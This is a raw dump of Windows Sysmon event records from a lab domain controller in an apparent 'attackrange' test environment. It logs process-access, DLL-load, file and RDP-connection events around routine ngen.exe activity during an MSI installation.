14:57:20.546{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-EA0B-00000000BB01}6588c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.546{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-EA0B-00000000BB01}6588c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.546{A7A01FEF-EBD0-607E-EA0B-00000000BB01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.530{A7A01FEF-EBD0-607E-EB0B-00000000BB01}28805676C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-EA0B-00000000BB01}6588c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.530{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-EB0B-00000000BB01}2880C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.515{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-EA0B-00000000BB01}6588c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.515{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-EA0B-00000000BB01}6588c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.515{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-E80B-00000000BB01}3252c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.515{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-E80B-00000000BB01}3252c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.499{A7A01FEF-EBD0-607E-E80B-00000000BB01}3252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.483{A7A01FEF-EBD0-607E-E90B-00000000BB01}51283244C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-E80B-00000000BB01}3252c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.483{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-E90B-00000000BB01}5128C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.483{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-E80B-00000000BB01}3252c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.483{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-E80B-00000000BB01}3252c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.468{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-E60B-00000000BB01}7048c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.468{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-E60B-00000000BB01}7048c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.468{A7A01FEF-EBD0-607E-E60B-00000000BB01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.452{A7A01FEF-EBD0-607E-E70B-00000000BB01}36287164C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-E60B-00000000BB01}7048c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.436{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-E70B-00000000BB01}3628C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.436{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-E60B-00000000BB01}7048c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.436{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-E60B-00000000BB01}7048c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.421{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-E40B-00000000BB01}3000c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.421{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-E40B-00000000BB01}3000c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.421{A7A01FEF-EBD0-607E-E40B-00000000BB01}3000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.405{A7A01FEF-EBD0-607E-E50B-00000000BB01}9445520C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-E40B-00000000BB01}3000c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.405{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-E50B-00000000BB01}944C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 354300x800000000000000073688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.140{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-18916-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000073687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.390{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-E40B-00000000BB01}3000c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.390{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-E40B-00000000BB01}3000c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000073685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.390{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=725AF66E2F8F671A10D7D375FF1BCD79,SHA256=660C0E191D75D99925D672CDE358E48EE32697222D6F7867AC8B19850CD33296,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.390{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-E20B-00000000BB01}1772c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.390{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-E20B-00000000BB01}1772c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.390{A7A01FEF-EBD0-607E-E20B-00000000BB01}1772C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft 